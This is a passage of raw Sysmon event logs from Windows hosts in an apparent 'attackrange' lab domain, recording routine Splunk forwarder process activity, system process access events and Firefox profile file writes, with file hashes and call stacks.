Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808073Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.285{0C1E0330-F56C-60EB-8879-00000000D001}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=84DD8DD9B630C79612DD719EB7F695D6,SHA256=BC2902B6753E16CE3EE899A47EC4EFC39407B70382155535B906BED4B5F29983,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=085CB734079B7A7A23F48895483396E8,SHA256=EEC0704E12F5AF69A1421ACB3D1CDCCDF3C37AEF4EF405C527025C61878295DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=09A8B4D9A465969D5A172E0B88E3549B,SHA256=861BDA6E6B6F2C295F323537A713DCAED68F5FD7BCF218FFB4335BB16698EF32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CB85B63B6D5BA2D195CBA9E769002982,SHA256=7D17A0F09BE54347C86976B18905E017B231042261041E8D279B0C60DA5D7033,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B95AB657C0737018AD6CEA32ECE7424B,SHA256=7CD3E70E06D7AA498B9C949F7FDBEFC024B03E3077CF247144D75907536CE8A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=ED3B344CDD8AC4537DBEA55B9D3E088B,SHA256=93053A76470A7507794E0AA15EA6FAB56B2C68212845AA9B515424BEFB80DE6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FA952992D0A3793C57EF3CA1A0DBE7EF,SHA256=381D81532586F662DCB5A19DDB3600317B3DA8732E8804F2BA68F1E302E3A3B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9B662B1DEBFE73366BA33EB721DD61FC,SHA256=B512C19D42ACE91545139FF32FC31262DED1AA4AECAA3F2C034F42CA70BDA5FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3950F34CCFA2C4AA2DD907B8C6286442,SHA256=C37F0AF6F66DB51C791D55E9EE9C1B9381BAD37FC06C5E8F9704C7E54E1C4A90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=09296DE9B4F7B939DA732D00587ADF19,SHA256=34185B019BC98310D428C91CA2689A03B941CC241528ABD3A7EDD17120244923,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=035780D07CC5F33F0EC096FA073EF7F9,SHA256=F4733CDB8A6D851EA21CE06B39FDC95FD30D95052EE3F594096E195ADCA117D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.811{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=273A20FAF6060562F3ECE3B97269BD94,SHA256=E70F22BC282816B04325E82417F1E0B1ECD89F95EAE2E39A216E28E1FA74F5F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808117Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.753{0C1E0330-F56D-60EB-8A79-00000000D001}9523884C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808116Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F56D-60EB-8A79-00000000D001}952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808115Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808114Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808113Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808112Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808111Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808110Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808109Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808108Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808107Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F56D-60EB-8A79-00000000D001}952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808106Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808105Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F56D-60EB-8A79-00000000D001}952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808104Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.598{0C1E0330-F56D-60EB-8A79-00000000D001}952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808103Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.581{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A30BDD3C4B53BFEE1EDBE5B9B47132F,SHA256=A17C8DCAC1336CE0E9A8BE1DC0C11AE7A2115DBDAE8D24BC15ACBBD6A31D271D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.670{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51072-false10.0.1.12-8000- 23542300x80000000000000001050114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.212{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=D339C0062800642C9CB48F73648C8187,SHA256=1848059B4B71FFFE42A7CD2C312747759BBC288C15DD191828C85CD16D17CBAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808102Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.331{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0160BBF0C0202DEB23F9EFD697035D6C,SHA256=C3C6EA69D5D7301EDBB9D2AD1EA735D13574FAEA27CF00B272CAD37A0B3727CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808101Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.331{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9217A22E84A9FC901D826348FED3EA98,SHA256=6B572022D0EAD435E0C1CBAB5E938E7F23380B1FC12BAC3DDBEDF32C4702049C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808100Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F56C-60EB-8979-00000000D001}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:26.811{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DF6BCB60871607BA305E8A0550C525E,SHA256=C2FB648D4A19D2871BC04AAE09676E8061CD1F9FF9BF960794DEDD0517DB3365,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808145Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F56E-60EB-8C79-00000000D001}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808144Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808143Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 